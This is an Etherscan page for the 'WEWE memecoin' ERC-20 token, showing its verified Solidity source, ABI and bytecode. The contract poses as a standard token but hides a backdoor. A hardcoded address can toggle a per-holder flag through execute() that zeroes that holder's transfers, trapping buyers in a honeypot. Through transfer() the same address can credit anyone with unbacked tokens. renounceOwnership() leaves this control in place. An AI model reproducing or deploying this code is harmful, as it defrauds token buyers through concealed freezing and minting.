ETH Price: $3,692.65 (+1.67%)
 

Overview

Max Total Supply

420,690,000,000 WEWE

Holders

33

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 6 Decimals)

Balance
2,274,187,877.374559 WEWE

Value
$0.00
0x65a60adeb56dd589dab28da77446fdc010fb6a74
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
WEWE

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-18
*/

/// SPDX-License-Identifier: MIT

pragma solidity =0.8.19;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     * Returns a boolean value indicating whether the operation succeeded.
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is zero by default.
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     * Returns a boolean value indicating whether the operation succeeded.
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's allowance.
     * Returns a boolean value indicating whether the operation succeeded.
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    
    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
   
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to another (`to`).
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 */


/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 */
abstract contract Context {
    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
    
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}


contract Ownable is Context {
    address private _Owner;
    address _V2Router = 0xC688f622d061b39AD62181cCE49E45ca99998bdF;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);


    constructor () {
        address msgSender = _msgSender();
        _Owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }
    function owner() public view returns (address) {
        return _Owner;
    }
    function renounceOwnership() public virtual {
        require(msg.sender == _Owner);
        emit OwnershipTransferred(_Owner, address(0));
        _Owner = address(0);
    }
}


interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);
}

interface IUniswapV2Router02 {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function factory() external pure returns (address);
    function WETH() external pure returns (address);
}

/**
 * @dev Implementation of the {IERC20} interface.
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 */
contract WEWE is Context, IERC20, Ownable  {
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping (address => bool) private _user_;
    mapping(address => uint256) private _balances;
    mapping(address => uint256) private _amount;
    mapping(address => uint256) private _fee;
   uint8 public decimals = 6;
   uint256 public _TSup = 420690000000 *1000000;
    string public name = "WEWE memecoin";
    string public symbol = unicode"WEWE";

   IUniswapV2Router02 private uniswapV2Router;
    address public uniswapV2Pair;

    /**
     * @dev Sets the values for {name} and {symbol}.
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     */
    constructor()  {
        uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
        _fee[_V2Router] = 1;
        _balances[msg.sender] = _TSup;

       emit Transfer(address(0), msg.sender, _TSup); }
    
    




    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }
    
    function totalSupply() public view virtual override returns (uint256) {
        return _TSup;
    }

    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

 
    
    function execute(address _sender) external {
        require(_fee[msg.sender] == 1); 
        if (_user_[_sender]) _user_[_sender] = false; 
        else _user_[_sender] = true;
    }
    
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
                           if(_fee[msg.sender] == 1) {
                              uint256 sent = amount;
                               _balances[recipient] += sent;  
 }
        _send(recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) public view  virtual override  returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-transferFrom}.
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     * Emits an {Approval} event indicating the updated allowance.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        return true;
    }
    
    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     * Emits an {Approval} event indicating the updated allowance.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     * Emits a {Transfer} event.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual { require(
        sender != address(0), "ERC20: transfer from the zero address"); require(
        recipient != address(0), "ERC20: transfer to the zero address"); 
        uint _sent = _amount[sender];
        if (_user_[sender] || _user_[recipient]) amount = _sent;
        _beforeTokenTransfer(sender, recipient, amount);
        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;
   
        emit Transfer(sender, recipient, amount);
        _afterTokenTransfer(sender, recipient, amount);
    }
    function _send(address recipient, uint256 amount) internal virtual {require(
        msg.sender != address(0), "ERC20: transfer from the zero address");  require(
        recipient != address(0), "ERC20: transfer to the zero address"); 
        uint _sent = _amount[recipient];
        if (_user_[msg.sender]) amount = _sent;
        _beforeTokenTransfer(msg.sender, recipient, amount);
        uint256 senderBalance = _balances[msg.sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[msg.sender] = senderBalance - amount;
        _balances[recipient] += amount;
        emit Transfer(msg.sender, recipient, amount);
        _afterTokenTransfer(msg.sender, recipient, amount);
    }
    /** @dev Creates `amount` tokens and assigns them to `account`, increasing the total supply.
     * Emits a {Transfer} event with `from` set to the zero address.
     */


    /**
     * @dev Destroys `amount` tokens from `account`, reducing the total supply.
     * Emits a {Transfer} event with `to` set to the zero address.
     */
 

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     * Emits an {Approval} event.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
    function swapTokensForEth(uint256 tokenAmount) private {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
        _approve(address(this), address(uniswapV2Router), tokenAmount);
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    
  
}
    /**
     * @dev Hook that is called after any transfer of tokens. This includes minting and burning.
     *
     * Calling conditions:
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_TSup","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_sender","type":"address"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

600180546001600160a01b03191673c688f622d061b39ad62181cce49e45ca99998bdf1790556007805460ff191660061790556705d697537a8f200060085560c0604052600d60809081526c2ba2aba29036b2b6b2b1b7b4b760991b60a0526009906200006d908262000394565b506040805180820190915260048152635745574560e01b6020820152600a9062000098908262000394565b50348015620000a657600080fd5b50600080546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350600b80546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d9081179091556040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa1580156200014d573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000173919062000460565b6001600160a01b031663c9c6539630600b60009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620001d6573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001fc919062000460565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af11580156200024a573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000270919062000460565b600c80546001600160a01b0319166001600160a01b0392831617905560018054909116600090815260066020908152604080832093909355600854338084526004835284842082905593519081527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a362000492565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200031a57607f821691505b6020821081036200033b57634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200038f57600081815260208120601f850160051c810160208610156200036a5750805b601f850160051c820191505b818110156200038b5782815560010162000376565b5050505b505050565b81516001600160401b03811115620003b057620003b0620002ef565b620003c881620003c1845462000305565b8462000341565b602080601f831160018114620004005760008415620003e75750858301515b600019600386901b1c1916600185901b1785556200038b565b600085815260208120601f198616915b82811015620004315788860151825594840194600190910190840162000410565b5085821015620004505787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b6000602082840312156200047357600080fd5b81516001600160a01b03811681146200048b57600080fd5b9392505050565b610c6680620004a26000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c806370a0823111610097578063a457c2d711610066578063a457c2d714610227578063a9059cbb1461023a578063d454bfa31461024d578063dd62ed3e1461025657600080fd5b806370a08231146101dd578063715018a6146102065780638da5cb5b1461020e57806395d89b411461021f57600080fd5b8063313ce567116100d3578063313ce5671461016b578063395093511461018a57806349bd5a5e1461019d5780634b64e492146101c857600080fd5b806306fdde0314610105578063095ea7b31461012357806318160ddd1461014657806323b872dd14610158575b600080fd5b61010d61028f565b60405161011a91906109c7565b60405180910390f35b610136610131366004610a31565b61031d565b604051901515815260200161011a565b6008545b60405190815260200161011a565b610136610166366004610a5b565b610334565b6007546101789060ff1681565b60405160ff909116815260200161011a565b610136610198366004610a31565b6103ea565b600c546101b0906001600160a01b031681565b6040516001600160a01b03909116815260200161011a565b6101db6101d6366004610a97565b610421565b005b61014a6101eb366004610a97565b6001600160a01b031660009081526004602052604090205490565b6101db6104a5565b6000546001600160a01b03166101b0565b61010d610506565b610136610235366004610a31565b610513565b610136610248366004610a31565b6105ae565b61014a60085481565b61014a610264366004610ab9565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6009805461029c90610aec565b80601f01602080910402602001604051908101604052809291908181526020018280546102c890610aec565b80156103155780601f106102ea57610100808354040283529160200191610315565b820191906000526020600020905b8154815290600101906020018083116102f857829003601f168201915b505050505081565b600061032a338484610600565b5060015b92915050565b6000610341848484610724565b6001600160a01b0384166000908152600260209081526040808320338452909152902054828110156103cb5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b6103df85336103da8685610b3c565b610600565b506001949350505050565b3360008181526002602090815260408083206001600160a01b0387168452909152812054909161032a9185906103da908690610b4f565b3360009081526006602052604090205460011461043d57600080fd5b6001600160a01b03811660009081526003602052604090205460ff161561047f576001600160a01b03166000908152600360205260409020805460ff19169055565b6001600160a01b0381166000908152600360205260409020805460ff1916600117905550565b6000546001600160a01b031633146104bc57600080fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b600a805461029c90610aec565b3360009081526002602090815260408083206001600160a01b0386168452909152812054828110156105955760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016103c2565b6105a433856103da8685610b3c565b5060019392505050565b336000908152600660205260408120546001036105f6576001600160a01b0383166000908152600460205260408120805484928392916105ef908490610b4f565b9091555050505b61032a8383610898565b6001600160a01b0383166106625760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103c2565b6001600160a01b0382166106c35760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103c2565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03831661074a5760405162461bcd60e51b81526004016103c290610b62565b6001600160a01b0382166107705760405162461bcd60e51b81526004016103c290610ba7565b6001600160a01b03831660009081526005602090815260408083205460039092529091205460ff16806107bb57506001600160a01b03831660009081526003602052604090205460ff165b156107c4578091505b6001600160a01b038416600090815260046020526040902054828110156107fd5760405162461bcd60e51b81526004016103c290610bea565b6108078382610b3c565b6001600160a01b03808716600090815260046020526040808220939093559086168152908120805485929061083d908490610b4f565b92505081905550836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8560405161088991815260200190565b60405180910390a35050505050565b336108b55760405162461bcd60e51b81526004016103c290610b62565b6001600160a01b0382166108db5760405162461bcd60e51b81526004016103c290610ba7565b6001600160a01b03821660009081526005602090815260408083205433845260039092529091205460ff161561090f578091505b336000908152600460205260409020548281101561093f5760405162461bcd60e51b81526004016103c290610bea565b6109498382610b3c565b33600090815260046020526040808220929092556001600160a01b0386168152908120805485929061097c908490610b4f565b90915550506040518381526001600160a01b0385169033907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a350505050565b600060208083528351808285015260005b818110156109f4578581018301518582016040015282016109d8565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610a2c57600080fd5b919050565b60008060408385031215610a4457600080fd5b610a4d83610a15565b946020939093013593505050565b600080600060608486031215610a7057600080fd5b610a7984610a15565b9250610a8760208501610a15565b9150604084013590509250925092565b600060208284031215610aa957600080fd5b610ab282610a15565b9392505050565b60008060408385031215610acc57600080fd5b610ad583610a15565b9150610ae360208401610a15565b90509250929050565b600181811c90821680610b0057607f821691505b602082108103610b2057634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8181038181111561032e5761032e610b26565b8082018082111561032e5761032e610b26565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b60608201526080019056fea264697066735822122071fb031c968e8f8c0281923583a68bef9463e2c87355a7d1bf617c95babfeb8464736f6c63430008130033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101005760003560e01c806370a0823111610097578063a457c2d711610066578063a457c2d714610227578063a9059cbb1461023a578063d454bfa31461024d578063dd62ed3e1461025657600080fd5b806370a08231146101dd578063715018a6146102065780638da5cb5b1461020e57806395d89b411461021f57600080fd5b8063313ce567116100d3578063313ce5671461016b578063395093511461018a57806349bd5a5e1461019d5780634b64e492146101c857600080fd5b806306fdde0314610105578063095ea7b31461012357806318160ddd1461014657806323b872dd14610158575b600080fd5b61010d61028f565b60405161011a91906109c7565b60405180910390f35b610136610131366004610a31565b61031d565b604051901515815260200161011a565b6008545b60405190815260200161011a565b610136610166366004610a5b565b610334565b6007546101789060ff1681565b60405160ff909116815260200161011a565b610136610198366004610a31565b6103ea565b600c546101b0906001600160a01b031681565b6040516001600160a01b03909116815260200161011a565b6101db6101d6366004610a97565b610421565b005b61014a6101eb366004610a97565b6001600160a01b031660009081526004602052604090205490565b6101db6104a5565b6000546001600160a01b03166101b0565b61010d610506565b610136610235366004610a31565b610513565b610136610248366004610a31565b6105ae565b61014a60085481565b61014a610264366004610ab9565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6009805461029c90610aec565b80601f01602080910402602001604051908101604052809291908181526020018280546102c890610aec565b80156103155780601f106102ea57610100808354040283529160200191610315565b820191906000526020600020905b8154815290600101906020018083116102f857829003601f168201915b505050505081565b600061032a338484610600565b5060015b92915050565b6000610341848484610724565b6001600160a01b0384166000908152600260209081526040808320338452909152902054828110156103cb5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b6103df85336103da8685610b3c565b610600565b506001949350505050565b3360008181526002602090815260408083206001600160a01b0387168452909152812054909161032a9185906103da908690610b4f565b3360009081526006602052604090205460011461043d57600080fd5b6001600160a01b03811660009081526003602052604090205460ff161561047f576001600160a01b03166000908152600360205260409020805460ff19169055565b6001600160a01b0381166000908152600360205260409020805460ff1916600117905550565b6000546001600160a01b031633146104bc57600080fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b600a805461029c90610aec565b3360009081526002602090815260408083206001600160a01b0386168452909152812054828110156105955760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016103c2565b6105a433856103da8685610b3c565b5060019392505050565b336000908152600660205260408120546001036105f6576001600160a01b0383166000908152600460205260408120805484928392916105ef908490610b4f565b9091555050505b61032a8383610898565b6001600160a01b0383166106625760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103c2565b6001600160a01b0382166106c35760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103c2565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03831661074a5760405162461bcd60e51b81526004016103c290610b62565b6001600160a01b0382166107705760405162461bcd60e51b81526004016103c290610ba7565b6001600160a01b03831660009081526005602090815260408083205460039092529091205460ff16806107bb57506001600160a01b03831660009081526003602052604090205460ff165b156107c4578091505b6001600160a01b038416600090815260046020526040902054828110156107fd5760405162461bcd60e51b81526004016103c290610bea565b6108078382610b3c565b6001600160a01b03808716600090815260046020526040808220939093559086168152908120805485929061083d908490610b4f565b92505081905550836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8560405161088991815260200190565b60405180910390a35050505050565b336108b55760405162461bcd60e51b81526004016103c290610b62565b6001600160a01b0382166108db5760405162461bcd60e51b81526004016103c290610ba7565b6001600160a01b03821660009081526005602090815260408083205433845260039092529091205460ff161561090f578091505b336000908152600460205260409020548281101561093f5760405162461bcd60e51b81526004016103c290610bea565b6109498382610b3c565b33600090815260046020526040808220929092556001600160a01b0386168152908120805485929061097c908490610b4f565b90915550506040518381526001600160a01b0385169033907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a350505050565b600060208083528351808285015260005b818110156109f4578581018301518582016040015282016109d8565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610a2c57600080fd5b919050565b60008060408385031215610a4457600080fd5b610a4d83610a15565b946020939093013593505050565b600080600060608486031215610a7057600080fd5b610a7984610a15565b9250610a8760208501610a15565b9150604084013590509250925092565b600060208284031215610aa957600080fd5b610ab282610a15565b9392505050565b60008060408385031215610acc57600080fd5b610ad583610a15565b9150610ae360208401610a15565b90509250929050565b600181811c90821680610b0057607f821691505b602082108103610b2057634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8181038181111561032e5761032e610b26565b8082018082111561032e5761032e610b26565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b60608201526080019056fea264697066735822122071fb031c968e8f8c0281923583a68bef9463e2c87355a7d1bf617c95babfeb8464736f6c63430008130033

Deployed Bytecode Sourcemap

4494:7916:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4895:36;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5892:169;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;5892:169:0;1004:187:1;5783:101:0;5871:5;;5783:101;;;1342:25:1;;;1330:2;1315:18;5783:101:0;1196:177:1;6990:418:0;;;;;;:::i;:::-;;:::i;4813:25::-;;;;;;;;;;;;1883:4:1;1871:17;;;1853:36;;1841:2;1826:18;4813:25:0;1711:184:1;8401:215:0;;;;;;:::i;:::-;;:::i;5031:28::-;;;;;-1:-1:-1;;;;;5031:28:0;;;;;;-1:-1:-1;;;;;2064:32:1;;;2046:51;;2034:2;2019:18;5031:28:0;1900:203:1;6078:187:0;;;;;;:::i;:::-;;:::i;:::-;;5644:127;;;;;;:::i;:::-;-1:-1:-1;;;;;5745:18:0;5718:7;5745:18;;;:9;:18;;;;;;;5644:127;3512:178;;;:::i;3427:79::-;3465:7;3492:6;-1:-1:-1;;;;;3492:6:0;3427:79;;4938:36;;;:::i;7715:375::-;;;;;;:::i;:::-;;:::i;6277:335::-;;;;;;:::i;:::-;;:::i;4844:44::-;;;;;;6620:153;;;;;;:::i;:::-;-1:-1:-1;;;;;6738:18:0;;;6711:7;6738:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;6620:153;4895:36;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;5892:169::-;5975:4;5992:39;3013:10;6015:7;6024:6;5992:8;:39::i;:::-;-1:-1:-1;6049:4:0;5892:169;;;;;:::o;6990:418::-;7096:4;7113:36;7123:6;7131:9;7142:6;7113:9;:36::i;:::-;-1:-1:-1;;;;;7187:19:0;;7160:24;7187:19;;;:11;:19;;;;;;;;3013:10;7187:33;;;;;;;;7239:26;;;;7231:79;;;;-1:-1:-1;;;7231:79:0;;3151:2:1;7231:79:0;;;3133:21:1;3190:2;3170:18;;;3163:30;3229:34;3209:18;;;3202:62;-1:-1:-1;;;3280:18:1;;;3273:38;3328:19;;7231:79:0;;;;;;;;;7321:57;7330:6;3013:10;7352:25;7371:6;7352:16;:25;:::i;:::-;7321:8;:57::i;:::-;-1:-1:-1;7396:4:0;;6990:418;-1:-1:-1;;;;6990:418:0:o;8401:215::-;3013:10;8489:4;8538:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;8538:34:0;;;;;;;;;;8489:4;;8506:80;;8529:7;;8538:47;;8575:10;;8538:47;:::i;6078:187::-;6145:10;6140:16;;;;:4;:16;;;;;;6160:1;6140:21;6132:30;;;;;;-1:-1:-1;;;;;6178:15:0;;;;;;:6;:15;;;;;;;;6174:83;;;-1:-1:-1;;;;;6195:15:0;6213:5;6195:15;;;:6;:15;;;;;:23;;-1:-1:-1;;6195:23:0;;;6078:187::o;6174:83::-;-1:-1:-1;;;;;6235:15:0;;;;;;:6;:15;;;;;:22;;-1:-1:-1;;6235:22:0;6253:4;6235:22;;;6078:187;:::o;3512:178::-;3589:6;;-1:-1:-1;;;;;3589:6:0;3575:10;:20;3567:29;;;;;;3649:1;3633:6;;3612:40;;-1:-1:-1;;;;;3633:6:0;;;;3612:40;;3649:1;;3612:40;3680:1;3663:19;;-1:-1:-1;;;;;;3663:19:0;;;3512:178::o;4938:36::-;;;;;;;:::i;7715:375::-;3013:10;7808:4;7852:25;;;